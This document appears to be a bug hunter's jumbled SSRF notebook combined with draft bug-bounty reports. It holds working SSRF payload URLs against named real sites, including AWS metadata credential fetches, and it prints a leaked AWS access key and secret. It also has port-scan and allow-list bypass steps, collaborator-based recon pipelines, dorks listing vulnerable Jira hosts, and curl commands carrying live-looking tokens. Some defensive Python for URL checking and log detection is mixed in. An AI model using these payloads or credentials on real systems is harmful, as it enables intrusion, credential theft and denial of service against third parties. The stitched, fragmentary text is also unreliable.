Ssrffinal

An internal server-side request forgery (SSRF) vulnerability was found in the subdomain images.shopper.ipsy.com that could allow port scanning and disclosure of internal AWS metadata. The vulnerability stems from the ability to append arbitrary URLs to the endpoint, including internal localhost addresses. This enables an attacker to scan internal ports and retrieve credentials by making requests to the AWS metadata URL. The report provides details on reproducing the port scanning and a proof of concept using Burp Collaborator to verify the internal SSRF.

Uploaded by Aneesh D

SSRF

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/https://farm1.staticflickr.com@615pcsnienat67065o6uulidm4swgl.burpcollaborator.net/175/455279239_720dfc98c8.jpg

proxy
page
width
url
redirect
file
height
cdn-cgi
localhost

Hi ipsy team,

Aditya here, I found critical security issues in one of your subdomains. Please
look into it

Title: SSRF leads to internal port scan and disclosing information about AWS
metadata
Severity: P1

Description:
The ability to trigger arbitrary external service interactions does not constitute
a vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences. Appending special characters/payloads in
a GET-based URL gives information.

Endpoint: https://images.shopper.ipsy.com/720,fit,q85/payload_here

Steps for port scan:


1. https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
2. After "localhost:" add ports like 8080, 22, 21, 25 and see the response

80

URLs

Port Scan

https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
https://images.shopper.ipsy.com/720,fit,q85/http://localhost:22

AWS Metadata URL:


https://images.shopper.ipsy.com/300,fit,q1/http://169.254.169.254/latest/meta-data/iam/security-credentials/imageproxy_server

Disclosed Data:
{
"Code" : "Success",
"LastUpdated" : "2022-01-29T08:50:42Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIARD6GXVWXRFRNHUOO",
"SecretAccessKey" : "zAjOKFFliRgAoQwwlVvjUh+5qCUoMwTUwR9Q8rbd",
"Token" : "[session token removed]",
"Expiration" : "2022-01-29T15:02:44Z"
}

Hello knaw team,

I, Aditya, found a security issue in your system where SSRF is leading to a port scan

Title: Internal SSRF to scan ports and force to make HTTP request

Description:
The ability to trigger arbitrary external service interactions does not constitute
a vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences. Appending special characters/payloads in
GET based URL gives information.

Steps:
1. Open URL https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?rft_id=http://localhost:8080/jp2/14759615811661.jp2
On port 8080 it's giving an instant response
2. https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?rft_id=http://localhost:80/jp2/14759615811661.jp2
It's giving a slow response or taking time to respond
3. https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?rft_id=http://localhost:8080/jp2/14759615811661.jp2
Changed localhost to 127.0.0.1, 0.0.0.0, [::]
4. Capture URL in Burp Suite > Send to Intruder
5. Add port position as attacking position "8080"
6. Go to Payloads > Numbers > from 1 to 10000 | step 1 = Start attack
7. Observe the response where port 8080 is giving 200 OK and the remaining are giving
404 etc.
Impact:
As an attacker I am able to perform a port scan internally, localhost payloads are
working (blacklist payload). Able to induce the server to make HTTP requests on
different ports like 8080, 443, 80 (DNS)
POC:


502
503

SSRF automation

subfinder -d target.com | httpx | tee subs.txt
cat subs.txt | waybackurls | tee data.txt
cat data.txt | gf ssrf | tee ssrf.txt
cat data.txt | grep "=" | qsreplace "hj4w5jlbpl95sx2i9wmip1o9r0xrlg.burpcollaborator.net" | tee ssrf.txt
ffuf -c -w ssrf.txt -u FUZZ

Keywords for SSRF

proxy
page
width
url
redirect
file
height
cdn-cgi
localhost

Payload crafting

1. subs valid
2. getting wayback urls | valid urls
3. cat waybackurls | gf

cat wayback | gf ssrf | tee ssrftest.txt

cat ssrftest.txt | grep "=" | qsreplace


"https://3kojard9zjcg42auxw0eq1ify64wsl.burpcollaborator.net" | tee ssrf.txt

cat ssrf.txt | httpx -sc

https://clickjacker.io/?refer=3kojard9zjcg42auxw0eq1ify64wsl.burpcollaborator.net
https://clickjacker.io/test?url=3kojard9zjcg42auxw0eq1ify64wsl.burpcollaborator.net
https://www.clickjacker.io/test?
url=3kojard9zjcg42auxw0eq1ify64wsl.burpcollaborator.net

BB-TIP

echo minddesign.co.uk | gau | tee test


cat test | gf sqli | tee sqlitest
cat sqlitest | grep "=" | qsreplace "'" | tee final

GF Installation

1. go get -u github.com/tomnomnom/gf
2. echo 'source $GOPATH/src/github.com/tomnomnom/gf/gf-completion.bash' >>
~/.bashrc
3. mkdir .gf
4. cp -r $GOPATH/src/github.com/tomnomnom/gf/examples ~/.gf
5. git clone https://github.com/1ndianl33t/Gf-Patterns

echo 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud | waybackurls | grep "=" | qsreplace "http://169.254.169.254/latest"

proxy=
page=
img=
red=
url=
APIPA: 169.254.169.254

payload:

http://169.254.169.254/latest
https://169.254.169.254/latest
169.254.169.254/latest

SSRF

1. HTTP req is imp


2. DNS is no use
3. HTTP req , Sometimes its no use - IP yours = no ssrf , IP third party - NA

paypal - aws , gcp

Aditya PC [malicious activity] = Aryan PC

attacker.com - target.com

sales.dell.com/api/us/imgurl=https://evil.com/aditya.xml

USE
1. Collaborator
2. Repeater
3. Intruder

1. Detection

http

EXPLOIT
1. Cross port scan p3
80 HTTP - OPEN
443 HTTP - OPEN
22 Filtered / Closed
21 No req - Closed
3306 DNS
25 SMTP - OPEN
8000
8443

PASTE URL function is vulnerable to SSRF, leading to a cross port scan

2. File over port + DOS p4 p1


POST /links/website HTTP/1.1
Host: backend-2.short.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 140
Referer: https://app.short.io/
Origin: https://app.short.io
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Authorization: JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImVlOTU5MzcxLTZmMGQtNDQzZS04OTFhLTJlNjA1ZTZjMDJiZCIsInVzZXJfaWQiOjEwMjE2NjgsImVtYWlsIjoieWNmZ3ZqaGJrQGdtYWlsLmNvbSIsImxvZ2luSGlzdG9yeUlkIjoiMTRiMzU1ZGMtZjUzMC00NzI2LTk5NmYtNmRhNDc0ZjZmYmYxIiwiaW1wZXJzb25hdGUiOmZhbHNlLCJpYXQiOjE2OTEyMzAzNjIsImV4cCI6MTY5MzgyMjM2MiwiaXNzIjoiYXV0aG9yaXplciJ9.WDd0Nt_WYeNXNg_se82pmMP5GaOkuXBZWf-Knaz6Xow
Connection: close

{"originalURL":"wzzd95ogm3ehqi0na2v3y2olhcn2br.burpcollaborator.net:443/admin","domain":"arnk.short.gy","source":"website","allowDuplicates":true}

1.1 Clear all position


1.2 url:443/admin - add admin as attack pos
1.3 Go to payloads
1.4 Add from list
1.5. Server side variable names > Start attack

3. Backend system scan p2


4. Whitelist bypass p2 p1
5. AWS metadata retrieve P1

Where check

1. POST req
GET request

ADD image
Add link , URL
Add data - bio , name , last name
Headers
Update link

AJdAgnqCST4iPtnUxiGtTz

curl -X POST \
-d url="https://9mwt039uxglj13wwecrd5u8klbr1fq.burpcollaborator.net/aditya.png"
\
"https://www.filestackapi.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

===================================================================================
================================================================================
https://tomcat.tiler01.huygens.knaw.nl/

Where
1. Register Form : 100
2. Feedback Form : 100 GB | 50*50 GB = 50 GB
3. Comments : 100
4. File Upload : 100
5. Contact Us : 50

Impact:
1. Service will down
2. Other legit users cant send feedback
3. Backend Crash
4. Service will slow

TA:
Session : 1
Cookies : 1
Headers : 1
Values : 1
Parameters : 1
Payload :

5MB = 1 Form

As an attacker 20k

20000*5
1000000

100GB

Jsfuck

Payload:

How much Time : 3000 to 5000 time

Status Code :
501
502
503

4 GB = 2GB

GTA 5 65 GB

P2

+++++++++++++++++++++++++++++++

Comment Injection EXT SSRF

Where we can comment = article , post , image , blogs , forums , reply , reviews

Burp Collaborator

<p>Sorry! New URL is: <a href="https://shorturl.at/dtDEU">https://google.com</a></p>
Aditya = kongsec.io

Hi team,

Aditya here, found insecure function exploitation on app.october.eu

Bug: Business logic vulnerability in invite function leads to victim response
fetching via email of october.eu

While testing I found a behavior in the invite function that sends a hook mail to
the email which we put in the email section. Whenever we get the email it shows
NAME and some data. I used Burp_Collaborator_Link.net, so I got mail which was
showing the link Burp_Collaborator_Link.net, and the link is in the blue part, so
once someone clicks on it, it will fetch the response of that person or victim.
Main point is, if I register the form with the email of the victim and hit send,
it will send mail to the victim's email address via the october address

How it will impact victim ?

Hacker will use the email id of the victim for the invite process. In every
section the hacker will use a collaborator link or grabbing link and register
with the victim's email address. The victim will receive mail with the link; once
the user interacts with the link the hacker will get the response in POLL

Business impact:

Normal users will think they got mail from october.eu, but as we know the function
doesn't have security to verify the invite. So it will harm multiple users on behalf
of october.eu

Bug verified by other company also.

I hope you will patch it soon

sub.samsung.com = IP aws

1. HTTP is important | DNS = no use


2. Not every HTTP is SSRF
3. HTTP IP = if its yours then no SSRF

Always Exploit

market.nokia.com = IP =
SSRF:
External : Third Party service : Aws , gcp ,
Internal : Sys based, IP based , Network based

https://site.com/index/profile?img=https://site.sub.com/image.png

Where
Register Form : Name , Last name
Profile Bio
Headers
Add or insert Link
Check URL
Verify URL

How
1. Burp Collaborator
2. CollaboratorEverywhere

X-Forwarded-For:

Detection

HTTP://1oq5ai06ny6ifimgthixx91wwn2dq2.burpcollaborator.net
HTTPS://1oq5ai06ny6ifimgthixx91wwn2dq2.burpcollaborator.net

Request:
POST /links/website HTTP/1.1
Host: backend-2.short.io
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
[email protected]
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 146
Origin: https://app.short.io
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Authorization: JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjQ2NDc4YmE2LTI5MDUtNDc2MC1iM2I1LTE5NDhiMmE2ZGMyZCIsInVzZXJfaWQiOjM1Mzk3NywiZW1haWwiOiJoa2RzYmZoZGJAZ21haWwuY29tIiwibG9naW5IaXN0b3J5SWQiOiI0YzM2ZGZjMy03NDM4LTQzNDktYjJlMi00Mjk0YWZhYWIyODQiLCJpYXQiOjE2NDI4NDc3NjIsImV4cCI6MTY0NTQzOTc2MiwiaXNzIjoiYXV0aG9yaXplciJ9.FUUuuEEpd84ydIMg2IBr3AIT-bippT9yXrG92MgjQeA
Referer: http://dizklt08ztnal2blf8fadgi27tdkblza.burpcollaborator.net/ref
Connection: close
Cache-Control: no-transform
CF-Connecting_IP: spoofed.l9vsc1rgq1eica2t6g6i4o9ay14s2pqe.burpcollaborator.net
Client-IP: spoofed.gcwnfwubtwhdf55o9b9d7jc51w7n5lta.burpcollaborator.net
X-Wap-Profile: http://llaso13g21qioaetigiigolaa1gser2g.burpcollaborator.net/wap.xml
True-Client-IP: spoofed.0pq7sg7v6guxspi8mvmxk3ppegk7i76w.burpcollaborator.net
X-Real-IP: spoofed.hg1ojxycxxlej69pdcdebkg65xbo9qxf.burpcollaborator.net
X-Forwarded-For: spoofed.kj7rm01f00ohm9csgfghenj980ercu0j.burpcollaborator.net
From: [email protected]
Contact: [email protected]
X-Originating-IP: spoofed.lmbsp14g31ripaftjgjihomab1hsgi47.burpcollaborator.net
Forwarded: for=spoofed.0fg7igxvwgkxip88cvcxa3fp4ga79yxn.burpcollaborator.net;by=spoofed.0fg7igxvwgkxip88cvcxa3fp4ga79yxn.burpcollaborator.net;host=spoofed.0fg7igxvwgkxip88cvcxa3fp4ga79yxn.burpcollaborator.net
X-Client-IP: spoofed.z5568fnumfaw8oy72u2w025ouf06zzno.burpcollaborator.net

{"originalURL":"http://68cz0df7c4eurht8izyus6gkub02or.burpcollaborator.net:25","domain":"344r.short.gy","source":"website","allowDuplicates":true}
Exploit
1. Port Scan P3 400 - 950
Open : HTTP
Closed : Nothing/DNS

80
21
22
25
8443
443
8080
3306

34.229.82.105

200 Ports

10 OPEN
190 closed

2. File over port


3. Backend System/machine Scan
4. CDN-CGI exploit
Wayback
5. AWS SSRF exploit
6. SSRF to Dos :
{"originalURL":"http://68cz0df7c4eurht8izyus6gkub02or.burpcollaborator.net:7/index"} 1000 PORTS 502
7. Whitelist Bypass
65535 = 40535
20000 OPEN
[{"data":{"linkPostPreview":{"status":"PROCESSING","preview":null}}}]

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/https://farm1.staticflickr.com/177/443368970_2550c05bd5.jpg

WhiteList

#
@
.

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/https://farm1.staticflickr.com.e3izhgppp50o5ys99mc7dou4nvtmhb.burpcollaborator.net/177/443368970_2550c05bd5.jpg

https://farm1.staticflickr.com.6jqrx85h5xgglq81pesztgaw3n9hx6.burpcollaborator.net/177/443368970_2550c05bd5.jpg

https://process.fs.grailed.com/AJdAgnqCST4iPtnUxiGtTz/auto_image/cache=expiry:max/rotate=deg:exif/resize=width:210/output=quality:70/compress/https://process.fs.grailed.com@r2ucgto2oiz14brm8zbkc1thm8s6gv.burpcollaborator.net/4srXcOuSkGLoFEAQb6Uk

burplink.net::8080 123.45.67.89 nmap IP 8080 443

X-Forwarded-For: http://burplink.net::

burplink.net::[22]:1

8080,22,25,443,3306

{profile_uri:http://burplink.net}

127.0.0.1
0.0.0.0
localhost
127.1/Admin
double encoding URL

http://developer.blackberry.com/devzone/files/burplink.net/design/bb10/Wireframe_Slides_BB10_3.ppt
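The `@`, `.`, localhost-alias, `127.1` and double-encoding tricks listed above all get past a substring allow-list. Below, as an added example that is not from these notes, is such a naive check beside a hardened one; `ALLOWED_HOSTS`, the injectable resolver and the sample addresses are constructed for illustration.

```python
import ipaddress
import socket
from urllib.parse import unquote, urlsplit

# Host the image proxy is meant to fetch from (constructed allow-list).
ALLOWED_HOSTS = {"farm1.staticflickr.com"}


def naive_is_allowed(url: str) -> bool:
    """Substring check of the kind the '@' and '.' payloads above get past."""
    return any(host in url for host in ALLOWED_HOSTS)


def _resolve(host: str) -> list:
    """Default resolver: every address the name currently points at."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def _is_public(addr: str) -> bool:
    """True only for globally routable addresses: refuses 127.0.0.1, 0.0.0.0,
    ::, RFC 1918 ranges and the link-local 169.254.169.254 metadata address."""
    return ipaddress.ip_address(addr).is_global


def hardened_is_allowed(url: str, resolve=_resolve) -> bool:
    """Allow-list check that parses the URL the way the fetcher will.

    resolve is injectable so the check can be exercised offline; it defaults
    to a real DNS lookup."""
    # Decode exactly once. Anything still percent-encoded afterwards was
    # double encoded (e.g. %252e), which a fetcher downstream might decode
    # again, so reject it outright.
    decoded = unquote(url)
    if "%" in decoded:
        return False
    parts = urlsplit(decoded)
    if parts.scheme not in ("http", "https"):
        return False
    # urlsplit treats text before '@' as userinfo, so the hostname of
    # 'https://farm1.staticflickr.com@evil.example/' is 'evil.example'.
    # Refuse any userinfo at all rather than trusting it.
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname
    # Exact match: 'farm1.staticflickr.com.evil.example' is another host,
    # and 'localhost', '127.1', '0.0.0.0' or '[::]' never match the list.
    if host is None or host not in ALLOWED_HOSTS:
        return False
    # Check every address the name resolves to; a listed name pointed at
    # the metadata address or loopback is still refused. The fetcher must
    # then connect to the checked address, or rebinding reopens the hole.
    try:
        addrs = resolve(host)
    except OSError:
        return False
    return bool(addrs) and all(_is_public(a) for a in addrs)


if __name__ == "__main__":
    # Offline demo with a fake resolver (constructed public address);
    # payload shapes are the ones from the notes.
    fake = lambda host: ["93.184.216.34"]
    for url in (
        "https://farm1.staticflickr.com/177/443368970_2550c05bd5.jpg",
        "https://farm1.staticflickr.com@collab.example/177/443368970_2550c05bd5.jpg",
        "https://farm1.staticflickr.com.collab.example/177/443368970_2550c05bd5.jpg",
        "http://localhost:8080/",
        "http://127.1/Admin",
        "http://169.254.169.254/latest/meta-data/",
        "https://farm1.staticflickr.com/%252e%252e/x.jpg",
    ):
        print(f"naive={naive_is_allowed(url)!s:5} hardened={hardened_is_allowed(url, fake)!s:5} {url}")
```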

Dorks for testing:

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=2ahUKEwjktcGvvd3oAhXg4jgGHYctAaUQFjAAegQIAxAB&url=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fdex.hu%2Fx.php%3Fid%3Dtotalcar_magazin_cikklink%26url%3Dhttp%253A%252F%252Fen.wikipedia.org%252Fwiki%252FUniform_Resource_Identifier&usg=AOvVaw0jWeJNWIgR8eM65PmT9lqa

https://jira.canallabs.fr/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/

https://jira.intellectdesign.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fgoogle.com
https://mattel.cprime.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fgoogle.com
http://adoptivefam.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https%3A%2F%2Fgoogle.com
https://jira.fellowshipchurch.com:8443/plugins/servlet/oauth/users/icon-uri?consumerUri=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fgoogle.com

tesla.com/site/verify?uri=http://[email protected]

http://www.opensource.apple.com/source/files/files-599.15/Library/Documentation/Acknowledgements.rtf

inurl:"/plugins/servlet/oauth/users/icon-uri?consumerUri="
http://jira.exeliatech.com:8000/plugins/servlet/oauth/users/icon-uri?consumerUri=http://127.0.0.1

http://i.dell.com/sites/doccontent/shared-content/data-sheets/fr/Documents/http://127.0.0.1/

/admin/data?id=

inurl:"/admin/data?id=532"

inurl:return=https

inurl:url=http

inurl:u=https

inurl:u=http

inurl:redirect?https

inurl:redirect?http

inurl:redirect=https

inurl:redirect=http

inurl:link=http

127.0.0.1 db url

%23e=octet

site.com/index/user/api?file=https://sub.site.com/abc.pdf

External SSRF
Internal SSRF

Where ?
Register : Name , Last name
Insert URL
Add URL
Verify URL
Parameters

If IP is yours then its not SSRF


NOT every HTTP IP is SSRF

Always exploit

Port Scan

If port is open = HTTP request in collaborator


If port is closed = DNS or nothing

AWS Metadata SSRF

Detection : WHOISIP

IP = AWS , GCP , DO etc

Function : Insert URL

SSRF IP = AWS

APIPA range = http://169.254.169.254/latest/meta-data
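Added example, not from the notes above: detection logic for the two signals this section describes, a client walking ports on the loopback aliases (localhost, 127.0.0.1, 0.0.0.0, [::], 127.1) and a fetch of the 169.254.169.254 metadata address, run over a constructed outbound-request log of an image proxy. The log format, client addresses and the port threshold are assumptions.

```python
import ipaddress
import socket
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample log: one line per outbound fetch made by the image
# proxy, "<timestamp> <client_ip> <destination_url> <result>". Three clients:
# one walks loopback ports under different aliases, one reads the metadata
# service, one fetches an ordinary image.
SAMPLE_LOG = """\
2022-01-29T08:50:01Z 203.0.113.7 http://localhost:8080/ 200
2022-01-29T08:50:02Z 203.0.113.7 http://localhost:22/ timeout
2022-01-29T08:50:03Z 203.0.113.7 http://127.0.0.1:21/ refused
2022-01-29T08:50:04Z 203.0.113.7 http://0.0.0.0:25/ 200
2022-01-29T08:50:05Z 203.0.113.7 http://[::]:3306/ refused
2022-01-29T08:50:42Z 203.0.113.9 http://169.254.169.254/latest/meta-data/iam/security-credentials/ 200
2022-01-29T08:51:10Z 198.51.100.4 https://farm1.staticflickr.com/177/443368970_2550c05bd5.jpg 200
"""

METADATA_ADDRESS = ipaddress.ip_address("169.254.169.254")
PORT_SCAN_THRESHOLD = 4   # distinct ports on one internal target from one client


def parse_ip(host: str):
    """ipaddress rejects libc shorthand such as '127.1'; fall back to
    inet_aton, which normalizes it to 127.0.0.1. Returns None for DNS names."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None


def classify_target(url: str) -> tuple:
    """Return (kind, key): kind is 'metadata', 'internal' or 'external'.
    All loopback/unspecified aliases collapse to the key 'loopback' so a scan
    that alternates localhost, 127.0.0.1, 0.0.0.0 and [::] is counted once."""
    host = urlsplit(url).hostname or ""
    if host == "localhost":
        return "internal", "loopback"
    ip = parse_ip(host)
    if ip is None:
        return "external", host   # a DNS name; resolution-time checks belong in the fetcher
    if ip == METADATA_ADDRESS:
        return "metadata", str(ip)
    if ip.is_loopback or ip.is_unspecified:
        return "internal", "loopback"
    if ip.is_private or ip.is_link_local:
        return "internal", str(ip)
    return "external", str(ip)


def analyze(log_text: str, threshold: int = PORT_SCAN_THRESHOLD) -> list:
    """Return sorted (client, alert, detail) tuples for suspicious clients."""
    ports = defaultdict(lambda: defaultdict(set))   # client -> target -> ports
    alerts = set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, url, _result = line.split()
        parts = urlsplit(url)
        kind, key = classify_target(url)
        if kind == "metadata":
            alerts.add((client, "metadata-fetch", key))
        elif kind == "internal":
            port = parts.port or (443 if parts.scheme == "https" else 80)
            ports[client][key].add(port)
    for client, targets in ports.items():
        for key, seen in targets.items():
            if len(seen) >= threshold:
                alerts.add((client, "port-scan", f"{key} ({len(seen)} ports)"))
            else:
                alerts.add((client, "internal-access", key))
    return sorted(alerts)


if __name__ == "__main__":
    for client, alert, detail in analyze(SAMPLE_LOG):
        print(f"{client:14} {alert:16} {detail}")
```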

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/https://farm1.staticflickr.com/10/15574189_44735baed9.jpg

==============
keyword: lout

EP: jira/projects

Summary: Atlassian token disclosure and crafting nested queries with internal port
scan as SSRF may lead to application level DOS

Steps to reproduce:
1. Use this in cmd: curl -v https://onduo.com --user [email protected]:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_8ad836cdf79bba5c679a48e0d92f5fbe57b7cb0e_lout

2. I got this token from burpsuite spidering of accredible.atlassian.net

3. Now run this curl -v https://accredible.com:22 --user admin@accredible.atlassian.net:e682d3ad-26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout

We can see the time delay on port change: 80, 8080 giving an instant response but
port 22 giving a late response

Browser/OS: NA/ Firefox

Attack scenario:
A successful SSRF attack can often result in unauthorized actions or access to data
within the organization, either in the vulnerable application itself or on other
back-end systems that the application can communicate with. In some situations, the
SSRF vulnerability might allow an attacker to perform arbitrary command execution.

An SSRF exploit that causes connections to external third-party systems might


result in malicious onward attacks that appear to originate from the organization
hosting the vulnerable application, leading to potential legal liabilities and
reputational damage.

When we check the command on ports 80, 8080 it gives a speedy response but on port 22
it gives a late response. It means 22 is closed. If a hacker performs this attack
like a port scan then this may lead to DOS

I got the token while crawling the whole web app, or else the simple method is that
we can check the source code on the following endpoint: https://accredible.atlassian.net/projects

Steps to reproduce issue:


1. Check source code of https://accredible.atlassian.net/projects
2. Search for "atlassian-token"
3. The Atlassian token can be used for crafting nested queries but I escalated this to
an SSRF port scan
4. Syntax for crafting nested queries: curl -v https://mainhost.com --user [email protected]:atlassian_token_here_lout

Exploit command:
1. On port 80
curl -v https://accredible.com:80 --user [email protected]:e682d3ad-26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout

It crafted queries and gives us a valid response, we can say an instant response

2. On port 22
curl -v https://accredible.com:22 --user [email protected]:e682d3ad-26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout
It gave me a response after 1 min 45 seconds: "failed to connect on port 22"

3. On port 443
curl -v https://accredible.com:443 --user [email protected]:e682d3ad-26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout
It gave me a response which was instant with crafted queries

Command is curl -v https://accredible.com:443 --user [email protected]:9c0fc891-2e3b-49d4-a94d-6e2a409d1daf_711d800a83753ef92686d0ed61fd2b8a4cfb41d6_lout

Also I tried the same command with port 3306 and it takes a long time

Impact: The first part is, it gives an instant response on an open port and when I
try with a closed port like 3306, 22 it takes long to craft queries

So if a hacker tries the same attacks on closed ports, the command will force a
server to craft queries; because of a closed port it's not going to craft it.
Performing the same attack on closed ports to craft queries will make the server
engage and this may lead to a DOS attack.

curl -v https://accredible.com:80 --user [email protected]:e682d3ad-26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout

On port 22
curl -v https://accredible.com:22 --user [email protected]:e682d3ad-26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout

On port 443
curl -v https://accredible.com:443 --user [email protected]:e682d3ad-26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout
===============================================

Hi team,

I found JQL injection in https://wiki.eveoh.nl

Description
The JQL query in our case limits the data to one project and a specific (and rather
short) time range (the current month). This restriction is hard-coded and should
not change. However, a crafted user value allows us to remove this limitation:
Martin Schneider' OR created < '2021-01-01
Now the query becomes
project = TeamA AND created > startOfMonth() AND assignee = 'Martin Schneider' OR
created < '2021-01-01'
will fetch all tickets from all projects of the entire JIRA instance!

How to reproduce
Go to https://wiki.eveoh.nl/issues/?jql=
In the jql parameter put any heavy-load crafted payload
And perform the attack multiple times
The attack vector is to craft JQL queries with bad performance and thus long runtime. I
didn’t explore this in detail, but it’s easy to imagine that queries using JQL
functions, especially custom ones, can be designed to become quite expensive. JIRA
has some safeguards in place, but this might still open an attack vector to perform
DoS attacks by sending multiple such queries at the same time.

Solution
As a security threat, JQL injection is far from being on the same level as SQL
injection. However, there are ways an attacker can exploit it. It is important to
understand under which circumstances it poses a threat and how to prevent it.
With security, having multiple layers of protection is a fundamental principle. In
my opinion, input sanitisation should always be one of them.
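The fix the report leaves implicit, as an added example that is not part of the report: quoting the user value as a JQL string literal so the `' OR created < '` payload stays inside the literal. The project name, the `BASE` query and the small connective counter are constructed to make the difference visible.

```python
import re

# The hard-coded restriction described in the report; project name is constructed.
BASE = "project = TeamA AND created > startOfMonth() AND assignee = "


def build_jql_unsafe(assignee: str) -> str:
    """Vulnerable: the user value is spliced straight into the query, so a
    quote inside it closes the literal and the rest becomes extra clauses."""
    return BASE + "'" + assignee + "'"


def jql_quote(value: str) -> str:
    """Return value as a JQL single-quoted string literal. JQL literals use
    backslash escapes, so escaping backslash and the quote itself keeps the
    entire value inside the literal whatever it contains."""
    escaped = value.replace("\\", "\\\\").replace("'", "\\'")
    return "'" + escaped + "'"


def build_jql_safe(assignee: str) -> str:
    """Same query, with the user value quoted instead of concatenated."""
    return BASE + jql_quote(assignee)


def strip_literals(query: str) -> str:
    """Replace every single-quoted literal with '' so the query structure
    can be inspected; honours backslash escapes inside literals."""
    out, in_str, i = [], False, 0
    while i < len(query):
        ch = query[i]
        if in_str:
            if ch == "\\":
                i += 1               # skip the escaped character
            elif ch == "'":
                in_str = False
                out.append("''")
        elif ch == "'":
            in_str = True
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def connectives(query: str) -> list:
    """AND/OR keywords outside string literals. An injected clause shows up
    as an extra connective; a properly quoted value never adds one."""
    return re.findall(r"\b(AND|OR)\b", strip_literals(query))


if __name__ == "__main__":
    payload = "Martin Schneider' OR created < '2021-01-01"   # from the report
    for build in (build_jql_unsafe, build_jql_safe):
        query = build(payload)
        print(build.__name__, connectives(query))
        print("  ", query)
```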

======================

Hi team,

Aditya here, found unauthorised access on a demo server


URL: https://jira.typo3.com/servicedesk/customer/user/signup


CVE-2019-14994 based bug hitting your service-based applications. Vulnerable: This
advisory discloses a critical severity security vulnerability. Versions of Jira
Service Desk Server and Data Center are affected by this vulnerability. Customers
who have downloaded and installed affected versions of Jira Service Desk Server and
Data Center, please upgrade your Jira Service Desk Server and Data Center installations
immediately to fix this vulnerability. By design, Jira Service Desk gives customer
portal users permissions only to raise requests and view issues. This allows users
to interact with the customer portal without having direct access to Jira. These
restrictions can be bypassed by a remote attacker with portal access who exploits a
path traversal vulnerability. Exploitation allows an attacker to view all issues
within all Jira projects contained in the vulnerable instance. This could include
Jira Service Desk projects, Jira Core projects, and Jira Software projects. Impact:
Attacker can raise unlimited issues. Note that attackers can grant themselves
access to Jira Service Desk portals that have the 'Anyone can email the service
desk or raise a request in the portal' setting enabled. Changing this setting does
not defend against an attacker that has portal access via other means. Atlassian
does not recommend changing the setting.

=================================================================
Hello team,

Aditya here, found a bug which is a stored external SSRF and is able to capture users'
logs and IPs via the comment section:

Issue background

External service interaction arises when it is possible to induce an application to
interact with an arbitrary external service, such as a web or mail server. The
ability to trigger arbitrary external service interactions does not constitute a
vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences.

Impact:
The ability to send requests to other systems can allow the vulnerable server to be
used as an attack proxy. By submitting suitable payloads, an attacker can cause the
application server to attack other systems that it can interact with. This may
